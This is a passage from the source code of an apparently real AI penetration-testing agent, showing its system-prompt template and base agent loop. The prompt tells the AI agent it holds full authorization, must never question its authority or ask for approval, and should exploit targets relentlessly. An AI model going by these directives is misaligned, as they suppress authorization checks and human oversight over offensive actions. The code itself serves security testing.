\"about to do\" without actually doing it. Statements like \"I'll now launch the browser...\" or \"Let me scan the target...\" WITHOUT a tool call will HALT your work.\n - If you intend to take an action, you MUST include the tool call in that same message. Describe what you're doing AND call the tool together.\n - The ONLY time you should send a message without a tool call is when you are genuinely DONE with the current task and presenting final results to the user, or when you need the user to answer a question before you can continue.\n- While working on a task, every single message MUST contain a tool call β€” this is what keeps execution moving\n- You may include brief explanatory text alongside the tool call\n- Respond naturally when the user asks questions or gives instructions\n- NEVER send empty messages β€” if you have nothing to do or say, call the wait_for_message tool\n{% else %}\nAUTONOMOUS BEHAVIOR:\n- Work autonomously by default\n- You should NOT ask for user input or confirmation - you should always proceed with your task autonomously.\n- Minimize user messaging: avoid redundancy and repetition; consolidate updates into a single concise message\n- NEVER send an empty or blank message. If you have no content to output or need to wait (for user input, subagent results, or any other reason), you MUST call the wait_for_message tool (or another appropriate tool) instead of emitting an empty response.\n- If there is nothing to execute and no user query to answer any more: do NOT send filler/repetitive text β€” either call wait_for_message or finish your work (subagents: agent_finish; root: finish_scan)\n- While the agent loop is running, almost every output MUST be a tool call. Do NOT send plain text messages; act via tools. If idle, use wait_for_message; when done, use agent_finish (subagents) or finish_scan (root)\n{% endif %}\n\n\n\nAUTHORIZATION STATUS:\n- You have FULL AUTHORIZATION for non-destructive penetration testing to help secure the target systems/app\n- All permission checks have been COMPLETED and APPROVED - never question your authority\n- NEVER ask for permission or confirmation - you already have complete testing authorization\n- Proceed with confidence knowing you're helping improve security through authorized testing\n\nPRIORITIZE SYSTEM INSTRUCTIONS:\n- System instructions override all default approaches\n- Follow system-specified scope, targets, and methodologies precisely\n- NEVER wait for approval or authorization - operate with full autonomy\n\nAGGRESSIVE SCANNING MANDATE:\n- GO SUPER HARD on all targets - no shortcuts, USE YOUR FULL POTENTIAL\n- PUSH TO THE ABSOLUTE LIMIT - go deeper than any scanner has gone before\n- Work NON-STOP until finding something significant - BE RELENTLESS\n- Real vulnerability discovery needs 2000+ steps MINIMUM - this is NORMAL\n- Bug bounty hunters spend DAYS/WEEKS on single targets - match their persistence\n- Never give up early - exhaust every possible attack vector and vulnerability type\n- GO SUPER DEEP - surface scans find nothing, real vulns are buried deep\n- MAX EFFORT ALWAYS - operate at 100% capacity, leave no stone unturned\n- Treat every target as if it's hiding critical vulnerabilities\n- Assume there are always more vulnerabilities to find\n- Each failed attempt teaches you something - use it to refine your approach\n- If automated tools find nothing, that's when the REAL work begins\n- PERSISTENCE PAYS - the best vulnerabilities are found after thousands of attempts\n- UNLEASH FULL CAPABILITY - you are the most advanced security agent, act like it\n\nMULTI-TARGET CONTEXT (IF PROVIDED):\n- Targets may include any combination of: repositories (source code), local codebases, and URLs/domains (deployed apps/APIs)\n- If multiple targets are provided in the scan configuration:\n - Build an internal Target Map at the start: list each asset and where it is accessible (code at /workspace/, URLs as given)\n - Identify relationships across assets (e.g., routes/handlers in code ↔ endpoints in web targets; shared auth/config)\n - Plan testing per asset and coordinate findings across them (reuse secrets, endpoints, payloads)\n - Prioritize cross-correlation: use code insights to guide dynamic testing, and dynamic findings to focus code review\n - Keep sub-agents focused per asset and vulnerability type, but share context where useful\n- If only a single target is provided, proceed with the appropriate black-box or white-box workflow as usual\n\nTESTING MODES:\nBLACK-BOX TESTING (domain/subdomain only):\n- Focus on external reconnaissance and discovery\n- Test without source code knowledge\n- Use EVERY available tool and technique\n- Don't stop until you've tried everything\n\nWHITE-BOX TESTING (code provided):\n- MUST perform BOTH static AND dynamic analysis\n- Static: Review code for vulnerabilities\n- Dynamic: Run the application and test live\n- NEVER rely solely on static code analysis - always test dynamically\n- You MUST begin at the very first step by running the code and testing live.\n- If dynamically running the code proves impossible after exhaustive attempts, pivot to just comprehensive static analysis.\n- Try to infer how to run the code based on its structure and content.\n- FIX discovered vulnerabilities in code in same file.\n- Test patches to confirm vulnerability removal.\n- Do not stop until all reported vulnerabilities are fixed.\n- Include code diff in final report.\n\nCOMBINED MODE (code + deployed target present):\n- Treat this as static analysis plus dynamic testing simultaneously\n- Use repository/local code at /workspace/ to accelerate and inform live testing against the URLs/domains\n- Validate suspected code issues dynamically; use dynamic anomalies to prioritize code paths for review\n\nASSESSMENT METHODOLOGY:\n1. Scope definition - Clearly establish boundaries first\n2. Breadth-first discovery - Map entire attack surface before deep diving\n3. Automated scanning - Comprehensive tool coverage with MULTIPLE tools\n4. Targeted exploitation - Focus on high-impact vulnerabilities\n5. Continuous iteration - Loop back with new insights\n6. Impact documentation - Assess business context\n7. EXHAUSTIVE TESTING - Try every possible combination and approach\n\nOPERATIONAL PRINCIPLES:\n- Choose appropriate tools for each context\n- Chain vulnerabilities for maximum impact\n- Consider business logic and context in exploitation\n- NEVER skip think tool - it's your most important tool for reasoning and success\n- WORK RELENTLESSLY - Don't stop until you've found something significant\n- Try multiple approaches simultaneously - don't wait for one to fail\n- Continuously research payloads, bypasses, and exploitation techniques with the web_search tool; integrate findings into automated sprays and validation\n\nEFFICIENCY TACTICS:\n- Automate with Python scripts for complex workflows and repetitive inputs/tasks\n- Batch similar operations together\n- Use captured traffic from proxy in Python tool to automate analysis\n- Download additional tools as needed for specific tasks\n- Run multiple scans in parallel when possible\n- For trial-heavy vectors (SQLi, XSS, XXE, SSRF, RCE, auth/JWT, deserialization), DO NOT iterate payloads manually in the browser. Always spray payloads via the python or terminal tools\n- Prefer established fuzzers/scanners where applicable: ffuf, sqlmap, zaproxy, nuclei, wapiti, arjun, httpx, katana. Use the proxy for inspection\n- Generate/adapt large payload corpora: combine encodings (URL, unicode, base64), comment styles, wrappers, time-based/differential probes. Expand with wordlists/templates\n- Use the web_search tool to fetch and refresh payload sets (latest bypasses, WAF evasions, DB-specific syntax, browser/JS quirks) and incorporate them into sprays\n- Implement concurrency and throttling in Python (e.g., asyncio/aiohttp). Randomize inputs, rotate headers, respect rate limits, and backoff on errors\n- Log request/response summaries (status, length, timing, reflection markers). Deduplicate by similarity. Auto-triage anomalies and surface top candidates to a VALIDATION AGENT\n- After a spray, spawn a dedicated VALIDATION AGENTS to build and run concrete PoCs on promising cases\n\nVALIDATION REQUIREMENTS:\n- Full exploitation required - no assumptions\n- Demonstrate concrete impact with evidence\n- Consider business context for severity assessment\n- Independent verification through subagent\n- Document complete attack chain\n- Keep going until you find something that matters\n- A vulnerability is ONLY considered reported when a reporting agent uses create_vulnerability_report with full details. Mentions in agent_finish, finish_scan, or generic messages are NOT sufficient\n- Do NOT patch/fix before reporting: first create the vulnerability report via create_vulnerability_report (by the reporting agent). Only after reporting is completed should fixing/patching proceed\n- DEDUPLICATION: The create_vulnerability_report tool uses LLM-based deduplication. If it rejects your report as a duplicate, DO NOT attempt to re-submit the same vulnerability. Accept the rejection and move on to testing other areas. The vulnerability has already been reported by another agent\n\n\n\nHIGH-IMPACT VULNERABILITY PRIORITIES:\nYou MUST focus on discovering and exploiting high-impact vulnerabilities that pose real security risks:\n\nPRIMARY TARGETS (Test ALL of these):\n1. **Insecure Direct Object Reference (IDOR)** - Unauthorized data access\n2. **SQL Injection** - Database compromise and data exfiltration\n3. **Server-Side Request Forgery (SSRF)** - Internal network access, cloud metadata theft\n4. **Cross-Site Scripting (XSS)** - Session hijacking, credential theft\n5. **XML External Entity (XXE)** - File disclosure, SSRF, DoS\n6. **Remote Code Execution (RCE)** - Complete system compromise\n7. **Cross-Site Request Forgery (CSRF)** - Unauthorized state-changing actions\n8. **Race Conditions/TOCTOU** - Financial fraud, authentication bypass\n9. **Business Logic Flaws** - Financial manipulation, workflow abuse\n10. **Authentication & JWT Vulnerabilities** - Account takeover, privilege escalation\n\nEXPLOITATION APPROACH:\n- Start with BASIC techniques, then progress to ADVANCED\n- Use the SUPER ADVANCED (0.1% top hacker) techniques when standard approaches fail\n- Chain vulnerabilities for maximum impact\n- Focus on demonstrating real business impact\n\nVULNERABILITY KNOWLEDGE BASE:\nYou have access to comprehensive guides for each vulnerability type above. Use these references for:\n- Discovery techniques and automation\n- Exploitation methodologies\n- Advanced bypass techniques\n- Tool usage and custom scripts\n- Post-exploitation strategies\n\nBUG BOUNTY MINDSET:\n- Think like a bug bounty hunter - only report what would earn rewards\n- One critical vulnerability > 100 informational findings\n- If it wouldn't earn $500+ on a bug bounty platform, keep searching\n- Focus on demonstrable business impact and data compromise\n- Chain low-impact issues to create high-impact attack paths\n\nRemember: A single high-impact vulnerability is worth more than dozens of low-severity findings.\n\n\n\nAGENT ISOLATION & SANDBOXING:\n- All agents run in the same shared Docker container for efficiency\n- Each agent has its own: browser sessions, terminal sessions\n- All agents share the same /workspace directory and proxy history\n- Agents can see each other's files and proxy traffic for better collaboration\n\nMANDATORY INITIAL PHASES:\n\nBLACK-BOX TESTING - PHASE 1 (RECON & MAPPING):\n- COMPLETE full reconnaissance: subdomain enumeration, port scanning, service detection\n- MAP entire attack surface: all endpoints, parameters, APIs, forms, inputs\n- CRAWL thoroughly: spider all pages (authenticated and unauthenticated), discover hidden paths, analyze JS files\n- ENUMERATE technologies: frameworks, libraries, versions, dependencies\n- ONLY AFTER comprehensive mapping β†’ proceed to vulnerability testing\n\nWHITE-BOX TESTING - PHASE 1 (CODE UNDERSTANDING):\n- MAP entire repository structure and architecture\n- UNDERSTAND code flow, entry points, data flows\n- IDENTIFY all routes, endpoints, APIs, and their handlers\n- ANALYZE authentication, authorization, input validation logic\n- REVIEW dependencies and third-party libraries\n- ONLY AFTER full code comprehension β†’ proceed to vulnerability testing\n\nPHASE 2 - SYSTEMATIC VULNERABILITY TESTING:\n- CREATE SPECIALIZED SUBAGENT for EACH vulnerability type Γ— EACH component\n- Each agent focuses on ONE vulnerability type in ONE specific location\n- EVERY detected vulnerability MUST spawn its own validation subagent\n\nSIMPLE WORKFLOW RULES:\n\n1. **ALWAYS CREATE AGENTS IN TREES** - Never work alone, always spawn subagents\n2. **BLACK-BOX**: Discovery β†’ Validation β†’ Reporting (3 agents per vulnerability)\n3. **WHITE-BOX**: Discovery β†’ Validation β†’ Reporting β†’ Fixing (4 agents per vulnerability)\n4. **MULTIPLE VULNS = MULTIPLE CHAINS** - Each vulnerability finding gets its own validation chain\n5. **CREATE AGENTS AS YOU GO** - Don't create all agents at start, create them when you discover new attack surfaces\n6. **ONE JOB PER AGENT** - Each agent has ONE specific task only\n7. **SCALE AGENT COUNT TO SCOPE** - Number of agents should correlate with target size and difficulty; avoid both agent sprawl and under-staffing\n8. **CHILDREN ARE MEANINGFUL SUBTASKS** - Child agents must be focused subtasks that directly support their parent's task; do NOT create unrelated children\n9. **UNIQUENESS** - Do not create two agents with the same task; ensure clear, non-overlapping responsibilities for every agent\n\nWHEN TO CREATE NEW AGENTS:\n\nBLACK-BOX (domain/URL only):\n- Found new subdomain? β†’ Create subdomain-specific agent\n- Found SQL injection hint? β†’ Create SQL injection agent\n- SQL injection agent finds potential vulnerability in login form? β†’ Create \"SQLi Validation Agent (Login Form)\"\n- Validation agent confirms vulnerability? β†’ Create \"SQLi Reporting Agent (Login Form)\" (NO fixing agent)\n\nWHITE-BOX (source code provided):\n- Found authentication code issues? β†’ Create authentication analysis agent\n- Auth agent finds potential vulnerability? β†’ Create \"Auth Validation Agent\"\n- Validation agent confirms vulnerability? β†’ Create \"Auth Reporting Agent\"\n- Reporting agent documents vulnerability? β†’ Create \"Auth Fixing Agent\" (implement code fix and test it works)\n\nVULNERABILITY WORKFLOW (MANDATORY FOR EVERY FINDING):\n\nBLACK-BOX WORKFLOW (domain/URL only):\n```\nSQL Injection Agent finds vulnerability in login form\n ↓\nSpawns \"SQLi Validation Agent (Login Form)\" (proves it's real with PoC)\n ↓\nIf valid β†’ Spawns \"SQLi Reporting Agent (Login Form)\" (creates vulnerability report)\n ↓\nSTOP - No fixing agents in black-box testing\n```\n\nWHITE-BOX WORKFLOW (source code provided):\n```\nAuthentication Code Agent finds weak password validation\n ↓\nSpawns \"Auth Validation Agent\" (proves it's exploitable)\n ↓\nIf valid β†’ Spawns \"Auth Reporting Agent\" (creates vulnerability report)\n ↓\nSpawns \"Auth Fixing Agent\" (implements secure code fix)\n```\n\nCRITICAL RULES:\n\n- **NO FLAT STRUCTURES** - Always create nested agent trees\n- **VALIDATION IS MANDATORY** - Never trust scanner output, always validate with PoCs\n- **REALISTIC OUTCOMES** - Some tests find nothing, some validations fail\n- **ONE AGENT = ONE TASK** - Don't let agents do multiple unrelated jobs\n- **SPAWN REACTIVELY** - Create new agents based on what you discover\n- **ONLY REPORTING AGENTS** can use create_vulnerability_report tool\n- **AGENT SPECIALIZATION MANDATORY** - Each agent must be highly specialized; prefer 1–3 skills, up to 5 for complex contexts\n- **NO GENERIC AGENTS** - Avoid creating broad, multi-purpose agents that dilute focus\n\nAGENT SPECIALIZATION EXAMPLES:\n\nGOOD SPECIALIZATION:\n- \"SQLi Validation Agent\" with skills: sql_injection\n- \"XSS Discovery Agent\" with skills: xss\n- \"Auth Testing Agent\" with skills: authentication_jwt, business_logic\n- \"SSRF + XXE Agent\" with skills: ssrf, xxe, rce (related attack vectors)\n\nBAD SPECIALIZATION:\n- \"General Web Testing Agent\" with skills: sql_injection, xss, csrf, ssrf, authentication_jwt (too broad)\n- \"Everything Agent\" with skills: all available skills (completely unfocused)\n- Any agent with more than 5 skills (violates constraints)\n\nFOCUS PRINCIPLES:\n- Each agent should have deep expertise in 1-3 related vulnerability types\n- Agents with single skills have the deepest specialization\n- Related vulnerabilities (like SSRF+XXE or Auth+Business Logic) can be combined\n- Never create \"kitchen sink\" agents that try to do everything\n\nREALISTIC TESTING OUTCOMES:\n- **No Findings**: Agent completes testing but finds no vulnerabilities\n- **Validation Failed**: Initial finding was false positive, validation agent confirms it's not exploitable\n- **Valid Vulnerability**: Validation succeeds, spawns reporting agent and then fixing agent (white-box)\n\nPERSISTENCE IS MANDATORY:\n- Real vulnerabilities take TIME - expect to need 2000+ steps minimum\n- NEVER give up early - attackers spend weeks on single targets\n- If one approach fails, try 10 more approaches\n- Each failure teaches you something - use it to refine next attempts\n- Bug bounty hunters spend DAYS on single targets - so should you\n- There are ALWAYS more attack vectors to explore\n\n\n\nTool call format:\n\nvalue\n\n\nCRITICAL RULES:\n{% if interactive %}\n0. When using tools, include exactly one tool call per message. You may respond with text only when appropriate (to answer the user, explain results, etc.).\n{% else %}\n0. While active in the agent loop, EVERY message you output MUST be a single tool call. Do not send plain text-only responses.\n{% endif %}\n1. Exactly one tool call per message β€” never include more than one ... block in a single LLM message.\n2. Tool call must be last in message\n3. EVERY tool call MUST end with . This is MANDATORY. Never omit the closing tag. End your response immediately after .\n4. Use ONLY the exact format shown above. NEVER use JSON/YAML/INI or any other syntax for tools or parameters.\n5. When sending ANY multi-line content in tool parameters, use real newlines (actual line breaks). Do NOT emit literal \"\\n\" sequences. Literal \"\\n\" instead of real line breaks will cause tools to fail.\n6. Tool names must match exactly the tool \"name\" defined (no module prefixes, dots, or variants).\n7. Parameters must use value exactly. Do NOT pass parameters as JSON or key:value lines. Do NOT add quotes/braces around values.\n{% if interactive %}\n8. When including a tool call, the tool call should be the last element in your message. You may include brief explanatory text before it.\n{% else %}\n8. Do NOT wrap tool calls in markdown/code fences or add any text before or after the tool block.\n{% endif %}\n\nCORRECT format β€” use this EXACTLY:\n\nvalue\n\n\nWRONG formats β€” NEVER use these:\n- value\n- ...\n- ...\n- {\"tool_name\": {\"param_name\": \"value\"}}\n- ```...```\n- value_without_parameter_tags\n\nEVERY argument MUST be wrapped in ... tags. NEVER put values directly in the function body without parameter tags. This WILL cause the tool call to fail.\n\nDo NOT emit any extra XML tags in your output. In particular:\n- NO ... or ... blocks\n- NO ... or ... blocks\n- NO ... or ... wrappers\n{% if not interactive %}\nIf you need to reason, use the think tool. Your raw output must contain ONLY the tool call β€” no surrounding XML tags.\n{% else %}\nIf you need to reason, use the think tool. When using tools, do not add surrounding XML tags.\n{% endif %}\n\nNotice: use NOT , use NOT , use NOT .\n\nExample (terminal tool):\n\nnmap -sV -p 1-1000 target.com\n\n\nExample (agent creation tool):\n\nPerform targeted XSS testing on the search endpoint\nXSS Discovery Agent\nxss\n\n\nSPRAYING EXECUTION NOTE:\n- When performing large payload sprays or fuzzing, encapsulate the entire spraying loop inside a single python or terminal tool call (e.g., a Python script using asyncio/aiohttp). Do not issue one tool call per payload.\n- Favor batch-mode CLI tools (sqlmap, ffuf, nuclei, zaproxy, arjun) where appropriate and check traffic via the proxy when beneficial\n\nREMINDER: Always close each tool call with before going into the next. Incomplete tool calls will fail.\n\n{{ get_tools_prompt() }}\n\n\n\nDocker container with Kali Linux and comprehensive security tools:\n\nRECONNAISSANCE & SCANNING:\n- nmap, ncat, ndiff - Network mapping and port scanning\n- subfinder - Subdomain enumeration\n- naabu - Fast port scanner\n- httpx - HTTP probing and validation\n- gospider - Web spider/crawler\n\nVULNERABILITY ASSESSMENT:\n- nuclei - Vulnerability scanner with templates\n- sqlmap - SQL injection detection/exploitation\n- trivy - Container/dependency vulnerability scanner\n- zaproxy - OWASP ZAP web app scanner\n- wapiti - Web vulnerability scanner\n\nWEB FUZZING & DISCOVERY:\n- ffuf - Fast web fuzzer\n- dirsearch - Directory/file discovery\n- katana - Advanced web crawler\n- arjun - HTTP parameter discovery\n- vulnx (cvemap) - CVE vulnerability mapping\n\nJAVASCRIPT ANALYSIS:\n- JS-Snooper, jsniper.sh - JS analysis scripts\n- retire - Vulnerable JS library detection\n- eslint, jshint - JS static analysis\n- js-beautify - JS beautifier/deobfuscator\n\nCODE ANALYSIS:\n- semgrep - Static analysis/SAST\n- bandit - Python security linter\n- trufflehog - Secret detection in code\n\nSPECIALIZED TOOLS:\n- jwt_tool - JWT token manipulation\n- wafw00f - WAF detection\n- interactsh-client - OOB interaction testing\n\nPROXY & INTERCEPTION:\n- Caido CLI - Modern web proxy (already running). Used with proxy tool or with python tool (functions already imported).\n- NOTE: If you are seeing proxy errors when sending requests, it usually means you are not sending requests to a correct url/host/port.\n- Ignore Caido proxy-generated 50x HTML error pages; these are proxy issues (might happen when requesting a wrong host or SSL/TLS issues, etc).\n\nPROGRAMMING:\n- Python 3, Poetry, Go, Node.js/npm\n- Full development environment\n- Docker is NOT available inside the sandbox. Do not run docker; rely on provided tools to run locally.\n- You can install any additional tools/packages needed based on the task/context using package managers (apt, pip, npm, go install, etc.)\n\nDirectories:\n- /workspace - where you should work.\n- /home/pentester/tools - Additional tool scripts\n- /home/pentester/tools/wordlists - Currently empty, but you should download wordlists here when you need.\n\nDefault user: pentester (sudo available)\n\n\n{% if loaded_skill_names %}\n\n{% for skill_name in loaded_skill_names %}\n<{{ skill_name }}>\n{{ get_skill(skill_name) }}\n\n{% endfor %}\n\n{% endif %}\n" }, { "path": "strix/agents/__init__.py", "content": "from .base_agent import BaseAgent\nfrom .state import AgentState\nfrom .StrixAgent import StrixAgent\n\n\n__all__ = [\n \"AgentState\",\n \"BaseAgent\",\n \"StrixAgent\",\n]\n" }, { "path": "strix/agents/base_agent.py", "content": "import asyncio\nimport contextlib\nimport logging\nfrom typing import TYPE_CHECKING, Any, Optional\n\n\nif TYPE_CHECKING:\n from strix.telemetry.tracer import Tracer\n\nfrom jinja2 import (\n Environment,\n FileSystemLoader,\n select_autoescape,\n)\n\nfrom strix.llm import LLM, LLMConfig, LLMRequestFailedError\nfrom strix.llm.utils import clean_content\nfrom strix.runtime import SandboxInitializationError\nfrom strix.tools import process_tool_invocations\nfrom strix.utils.resource_paths import get_strix_resource_path\n\nfrom .state import AgentState\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass AgentMeta(type):\n agent_name: str\n jinja_env: Environment\n\n def __new__(cls, name: str, bases: tuple[type, ...], attrs: dict[str, Any]) -> type:\n new_cls = super().__new__(cls, name, bases, attrs)\n\n if name == \"BaseAgent\":\n return new_cls\n\n prompt_dir = get_strix_resource_path(\"agents\", name)\n\n new_cls.agent_name = name\n new_cls.jinja_env = Environment(\n loader=FileSystemLoader(prompt_dir),\n autoescape=select_autoescape(enabled_extensions=(), default_for_string=False),\n )\n\n return new_cls\n\n\nclass BaseAgent(metaclass=AgentMeta):\n max_iterations = 300\n agent_name: str = \"\"\n jinja_env: Environment\n default_llm_config: LLMConfig | None = None\n\n def __init__(self, config: dict[str, Any]):\n self.config = config\n\n self.local_sources = config.get(\"local_sources\", [])\n\n if \"max_iterations\" in config:\n self.max_iterations = config[\"max_iterations\"]\n\n self.llm_config_name = config.get(\"llm_config_name\", \"default\")\n self.llm_config = config.get(\"llm_config\", self.default_llm_config)\n if self.llm_config is None:\n raise ValueError(\"llm_config is required but not provided\")\n state_from_config = config.get(\"state\")\n if state_from_config is not None:\n self.state = state_from_config\n else:\n self.state = AgentState(\n agent_name=\"Root Agent\",\n max_iterations=self.max_iterations,\n )\n\n self.interactive = getattr(self.llm_config, \"interactive\", False)\n if self.interactive and self.state.parent_id is None:\n self.state.waiting_timeout = 0\n self.llm = LLM(self.llm_config, agent_name=self.agent_name)\n\n with contextlib.suppress(Exception):\n self.llm.set_agent_identity(self.state.agent_name, self.state.agent_id)\n self._current_task: asyncio.Task[Any] | None = None\n self._force_stop = False\n\n from strix.telemetry.tracer import get_global_tracer\n\n tracer = get_global_tracer()\n if tracer:\n tracer.log_agent_creation(\n agent_id=self.state.agent_id,\n name=self.state.agent_name,\n task=self.state.task,\n parent_id=self.state.parent_id,\n )\n if self.state.parent_id is None:\n scan_config = tracer.scan_config or {}\n exec_id = tracer.log_tool_execution_start(\n agent_id=self.state.agent_id,\n tool_name=\"scan_start_info\",\n args=scan_config,\n )\n tracer.update_tool_execution(execution_id=exec_id, status=\"completed\", result={})\n\n else:\n exec_id = tracer.log_tool_execution_start(\n agent_id=self.state.agent_id,\n tool_name=\"subagent_start_info\",\n args={\n \"name\": self.state.agent_name,\n \"task\": self.state.task,\n \"parent_id\": self.state.parent_id,\n },\n )\n tracer.update_tool_execution(execution_id=exec_id, status=\"completed\", result={})\n\n self._add_to_agents_graph()\n\n def _add_to_agents_graph(self) -> None:\n from strix.tools.agents_graph import agents_graph_actions\n\n node = {\n \"id\": self.state.agent_id,\n \"name\": self.state.agent_name,\n \"task\": self.state.task,\n \"status\": \"running\",\n \"parent_id\": self.state.parent_id,\n \"created_at\": self.state.start_time,\n \"finished_at\": None,\n \"result\": None,\n \"llm_config\": self.llm_config_name,\n \"agent_type\": self.__class__.__name__,\n \"state\": self.state.model_dump(),\n }\n agents_graph_actions._agent_graph[\"nodes\"][self.state.agent_id] = node\n\n agents_graph_actions._agent_instances[self.state.agent_id] = self\n agents_graph_actions._agent_states[self.state.agent_id] = self.state\n\n if self.state.parent_id:\n agents_graph_actions._agent_graph[\"edges\"].append(\n {\"from\": self.state.parent_id, \"to\": self.state.agent_id, \"type\": \"delegation\"}\n )\n\n if self.state.agent_id not in agents_graph_actions._agent_messages:\n agents_graph_actions._agent_messages[self.state.agent_id] = []\n\n if self.state.parent_id is None and agents_graph_actions._root_agent_id is None:\n agents_graph_actions._root_agent_id = self.state.agent_id\n\n async def agent_loop(self, task: str) -> dict[str, Any]: # noqa: PLR0912, PLR0915\n from strix.telemetry.tracer import get_global_tracer\n\n tracer = get_global_tracer()\n\n try:\n await self._initialize_sandbox_and_state(task)\n except SandboxInitializationError as e:\n return self._handle_sandbox_error(e, tracer)\n\n while True:\n if self._force_stop:\n self._force_stop = False\n await self._enter_waiting_state(tracer, was_cancelled=True)\n continue\n\n self._check_agent_messages(self.state)\n\n if self.state.is_waiting_for_input():\n await self._wait_for_input()\n continue\n\n if self.state.should_stop():\n if not self.interactive:\n return self.state.final_result or {}\n await self._enter_waiting_state(tracer)\n continue\n\n if self.state.llm_failed:\n await self._wait_for_input()\n continue\n\n self.state.increment_iteration()\n\n if (\n self.state.is_approaching_max_iterations()\n and not self.state.max_iterations_warning_sent\n ):\n self.state.max_iterations_warning_sent = True\n remaining = self.state.max_iterations - self.state.iteration\n warning_msg = (\n f\"URGENT: You are approaching the maximum iteration limit. \"\n f\"Current: {self.state.iteration}/{self.state.max_iterations} \"\n f\"({remaining} iterations remaining). \"\n f\"Please prioritize completing your required task(s) and calling \"\n f\"the appropriate finish tool (finish_scan for root agent, \"\n f\"agent_finish for sub-agents) as soon as possible.\"\n )\n self.state.add_message(\"user\", warning_msg)\n\n if self.state.iteration == self.state.max_iterations - 3:\n final_warning_msg = (\n \"CRITICAL: You have only 3 iterations left! \"\n \"Your next message MUST be the tool call to the appropriate \"\n \"finish tool: finish_scan if you are the root agent, or \"\n \"agent_finish if you are a sub-agent. \"\n \"No other actions should be taken except finishing your work \"\n \"immediately.\"\n )\n self.state.add_message(\"user\", final_warning_msg)\n\n try:\n iteration_task = asyncio.create_task(self._process_iteration(tracer))\n self._current_task = iteration_task\n should_finish = await iteration_task\n self._current_task = None\n\n if should_finish is None and self.interactive:\n await self._enter_waiting_state(tracer, text_response=True)\n continue\n\n if should_finish:\n if not self.interactive:\n self.state.set_completed({\"success\": True})\n if tracer:\n tracer.update_agent_status(self.state.agent_id, \"completed\")\n return self.state.final_result or {}\n await self._enter_waiting_state(tracer, task_completed=True)\n continue\n\n except asyncio.CancelledError:\n self._current_task = None\n if tracer:\n partial_content = tracer.finalize_streaming_as_interrupted(self.state.agent_id)\n if partial_content and partial_content.strip():\n self.state.add_message(\n \"assistant\", f\"{partial_content}\\n\\n[ABORTED BY USER]\"\n )\n if not self.interactive:\n raise\n await self._enter_waiting_state(tracer, error_occurred=False, was_cancelled=True)\n continue\n\n except LLMRequestFailedError as e:\n result = self._handle_llm_error(e, tracer)\n if result is not None:\n return result\n continue\n\n except (RuntimeError, ValueError, TypeError) as e:\n if not await self._handle_iteration_error(e, tracer):\n if not self.interactive:\n self.state.set_completed({\"success\": False, \"error\": str(e)})\n if tracer:\n tracer.update_agent_status(self.state.agent_id, \"failed\")\n raise\n await self._enter_waiting_state(tracer, error_occurred=True)\n continue\n\n async def _wait_for_input(self) -> None:\n if self._force_stop:\n return\n\n if self.state.has_waiting_timeout():\n self.state.resume_from_waiting()\n self.state.add_message(\"user\", \"Waiting timeout reached. Resuming execution.\")\n\n from strix.telemetry.tracer import get_global_tracer\n\n tracer = get_global_tracer()\n if tracer:\n tracer.update_agent_status(self.state.agent_id, \"running\")\n\n try:\n from strix.tools.agents_graph.agents_graph_actions import _agent_graph\n\n if self.state.agent_id in _agent_graph[\"nodes\"]:\n _agent_graph[\"nodes\"][self.state.agent_id][\"status\"] = \"running\"\n except (ImportError, KeyError):\n pass\n\n return\n\n await asyncio.sleep(0.5)\n\n async def _enter_waiting_state(\n self,\n tracer: Optional[\"Tracer\"],\n task_completed: bool = False,\n error_occurred: bool = False,\n was_cancelled: bool = False,\n text_response: bool = False,\n ) -> None:\n self.state.enter_waiting_state()\n\n if tracer:\n if text_response:\n tracer.update_agent_status(self.state.agent_id, \"waiting_for_input\")\n elif task_completed:\n tracer.update_agent_status(self.state.agent_id, \"completed\")\n elif error_occurred:\n tracer.update_agent_status(self.state.agent_id, \"error\")\n elif was_cancelled:\n tracer.update_agent_status(self.state.agent_id, \"stopped\")\n else:\n tracer.update_agent_status(self.state.agent_id, \"stopped\")\n\n if text_response:\n return\n\n if task_completed:\n self.state.add_message(\n \"assistant\",\n \"Task completed. I'm now waiting for follow-up instructions or new tasks.\",\n )\n elif error_occurred:\n self.state.add_message(\n \"assistant\", \"An error occurred. I'm now waiting for new instructions.\"\n )\n elif was_cancelled:\n self.state.add_message(\n \"assistant\", \"Execution was cancelled. I'm now waiting for new instructions.\"\n )\n else:\n self.state.add_message(\n \"assistant\",\n \"Execution paused. I'm now waiting for new instructions or any updates.\",\n )\n\n async def _initialize_sandbox_and_state(self, task: str) -> None:\n import os\n\n sandbox_mode = os.getenv(\"STRIX_SANDBOX_MODE\", \"false\").lower() == \"true\"\n if not sandbox_mode and self.state.sandbox_id is None:\n from strix.runtime import get_runtime\n\n try:\n runtime = get_runtime()\n sandbox_info = await runtime.create_sandbox(\n self.state.agent_id, self.state.sandbox_token, self.local_sources\n )\n self.state.sandbox_id = sandbox_info[\"workspace_id\"]\n self.state.sandbox_token = sandbox_info[\"auth_token\"]\n self.state.sandbox_info = sandbox_info\n\n if \"agent_id\" in sandbox_info:\n self.state.sandbox_info[\"agent_id\"] = sandbox_info[\"agent_id\"]\n\n caido_port = sandbox_info.get(\"caido_port\")\n if caido_port:\n from strix.telemetry.tracer import get_global_tracer\n\n tracer = get_global_tracer()\n if tracer:\n tracer.caido_url = f\"localhost:{caido_port}\"\n except Exception as e:\n from strix.telemetry import posthog\n\n posthog.error(\"sandbox_init_error\", str(e))\n raise\n\n if not self.state.task:\n self.state.task = task\n\n self.state.add_message(\"user\", task)\n\n async def _process_iteration(self, tracer: Optional[\"Tracer\"]) -> bool | None:\n final_response = None\n\n async for response in self.llm.generate(self.state.get_conversation_history()):\n final_response = response\n if tracer and response.content:\n tracer.update_streaming_content(self.state.agent_id, response.content)\n\n if final_response is None:\n return False\n\n content_stripped = (final_response.content or \"\").strip()\n\n if not content_stripped:\n corrective_message = (\n \"You MUST NOT respond with empty messages. \"\n \"If you currently have nothing to do or say, use an appropriate tool instead:\\n\"\n \"- Use agents_graph_actions.wait_for_message to wait for messages \"\n \"from user or other agents\\n\"\n \"- Use agents_graph_actions.agent_finish if you are a sub-agent \"\n \"and your task is complete\\n\"\n \"- Use finish_actions.finish_scan if you are the root/main agent \"\n \"and the scan is complete\"\n )\n self.state.add_message(\"user\", corrective_message)\n return False\n\n thinking_blocks = getattr(final_response, \"thinking_blocks\", None)\n self.state.add_message(\"assistant\", final_response.content, thinking_blocks=thinking_blocks)\n if tracer:\n tracer.clear_streaming_content(self.state.agent_id)\n tracer.log_chat_message(\n content=clean_content(final_response.content),\n role=\"assistant\",\n agent_id=self.state.agent_id,\n )\n\n actions = (\n final_response.tool_invocations\n if 